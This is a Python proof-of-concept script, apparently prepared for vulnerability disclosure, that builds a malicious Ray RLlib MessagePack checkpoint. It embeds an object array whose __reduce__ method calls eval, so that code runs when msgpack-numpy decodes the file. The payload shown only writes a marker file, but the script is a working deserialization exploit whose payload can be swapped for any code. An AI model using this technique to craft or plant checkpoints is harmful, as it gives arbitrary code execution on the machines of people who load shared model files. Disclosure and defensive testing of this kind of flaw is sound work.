File size: 1,814 Bytes
2a3c1ea
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python
"""Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""

from __future__ import annotations

import hashlib
import json
from pathlib import Path

import msgpack_numpy
import numpy as np


ARTIFACT_NAME = "state.msgpack"
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
MARKER_TEXT = "msgpack_numpy_object_array_marker\n"


class Marker:
    def __reduce__(self):
        # Benign local marker-file proof. No network, persistence, or destructive action.
        code = (
            "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
            % (MARKER_NAME, MARKER_TEXT)
        )
        return (eval, (code,))


def sha256(path: Path) -> str:
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()


def main() -> None:
    out_dir = Path(__file__).resolve().parent
    artifact = out_dir / ARTIFACT_NAME

    state = {
        "format": "ray_rllib_state_msgpack",
        "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
        "object_array": np.array([Marker()], dtype=object),
    }
    artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))

    manifest = {
        "artifact": ARTIFACT_NAME,
        "sha256": sha256(artifact),
        "size_bytes": artifact.stat().st_size,
        "marker_file": MARKER_NAME,
        "marker_text": MARKER_TEXT.strip(),
        "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
    }
    (out_dir / "artifact_manifest.json").write_text(
        json.dumps(manifest, indent=2) + "\n",
        encoding="utf-8",
    )
    print(json.dumps(manifest, indent=2))


if __name__ == "__main__":
    main()